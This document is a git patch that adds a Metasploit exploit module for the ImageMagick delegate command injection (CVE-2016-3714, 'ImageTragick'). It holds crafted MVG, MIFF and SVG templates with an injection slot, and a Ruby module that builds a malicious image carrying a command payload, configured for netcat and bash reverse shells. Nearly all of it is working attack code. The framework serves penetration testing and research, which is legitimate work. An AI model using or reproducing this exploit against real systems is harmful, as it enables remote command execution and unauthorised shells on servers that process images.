From 5c04db7a09f0c339c143fd2be98a28447f06d4f5 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 3 May 2016 16:43:16 -0500 Subject: [PATCH] Add ImageMagick exploit --- data/exploits/CVE-2016-3714/msf.miff | 14 ++++ data/exploits/CVE-2016-3714/msf.mvg | 8 ++ data/exploits/CVE-2016-3714/msf.svg | 5 ++ .../unix/fileformat/imagemagick_delegate.rb | 73 +++++++++++++++++++ 4 files changed, 100 insertions(+) create mode 100644 data/exploits/CVE-2016-3714/msf.miff create mode 100644 data/exploits/CVE-2016-3714/msf.mvg create mode 100644 data/exploits/CVE-2016-3714/msf.svg create mode 100644 modules/exploits/unix/fileformat/imagemagick_delegate.rb diff --git a/data/exploits/CVE-2016-3714/msf.miff b/data/exploits/CVE-2016-3714/msf.miff new file mode 100644 index 0000000000..619ebe0e9a --- /dev/null +++ b/data/exploits/CVE-2016-3714/msf.miff @@ -0,0 +1,14 @@ +id=ImageMagick version=1.0 +class=DirectClass colors=0 matte=False +columns=1 rows=1 depth=16 +colorspace=sRGB +page=1x1+0+0 +rendering-intent=Perceptual +gamma=0.454545 +red-primary=0.64,0.33 green-primary=0.3,0.6 blue-primary=0.15,0.06 +white-point=0.3127,0.329 +date:create=2016-05-04T00:19:42-05:00 +date:modify=2016-05-04T00:19:42-05:00 +label={";Lorem ipsum"} + +:ÿÿÿÿÿÿ diff --git a/data/exploits/CVE-2016-3714/msf.mvg b/data/exploits/CVE-2016-3714/msf.mvg new file mode 100644 index 0000000000..db2ceeb666 --- /dev/null +++ b/data/exploits/CVE-2016-3714/msf.mvg @@ -0,0 +1,8 @@ +push graphic-context +encoding "UTF-8" +viewbox 0 0 1 1 +affine 1 0 0 1 0 0 +push graphic-context +image Over 0,0 1,1 'url(https:";Lorem ipsum")' +pop graphic-context +pop graphic-context diff --git a/data/exploits/CVE-2016-3714/msf.svg b/data/exploits/CVE-2016-3714/msf.svg new file mode 100644 index 0000000000..effe2211b4 --- /dev/null +++ b/data/exploits/CVE-2016-3714/msf.svg @@ -0,0 +1,5 @@ + + + + diff --git a/modules/exploits/unix/fileformat/imagemagick_delegate.rb b/modules/exploits/unix/fileformat/imagemagick_delegate.rb new file mode 100644 index 0000000000..7d8c336f96 --- /dev/null +++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb @@ -0,0 +1,73 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit + + Rank = ExcellentRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ImageMagick Delegate Arbitrary Command Execution', + 'Description' => %q{ + This module exploits a command injection in ImageMagick <= 7.0.1-0. + }, + 'Author' => [ + 'stewie', # Vulnerability discovery + 'Nikolay Ermishkin', # Vulnerability discovery + 'wvu', # Metasploit module + 'hdm' # Metasploit module + ], + 'References' => [ + %w{CVE 2016-3714}, + %w{URL https://imagetragick.com/} + ], + 'DisclosureDate' => 'May 3 2016', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => false, + 'Payload' => { + 'BadChars' => "\x22\x27\x5c", # ", ', and \ + 'Compat' => { + 'PayloadType' => 'cmd cmd_bash', + 'RequiredCmd' => 'generic netcat bash-tcp' + } + }, + 'Targets' => [ + ['SVG file', template: 'msf.svg'], + ['MVG file', template: 'msf.mvg'], + ['MIFF file', template: 'msf.miff'] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'DisablePayloadHandler' => false, + 'WfsDelay' => 9001 + } + )) + + register_options([ + OptString.new('FILENAME', [true, 'Output file', 'msf.png']) + ]) + end + + def exploit + if target.name == 'SVG file' + p = Rex::Text.html_encode(payload.encoded) + else + p = payload.encoded + end + + file_create(template.sub('Lorem ipsum', p)) + end + + def template + File.read(File.join( + Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template] + )) + end + +end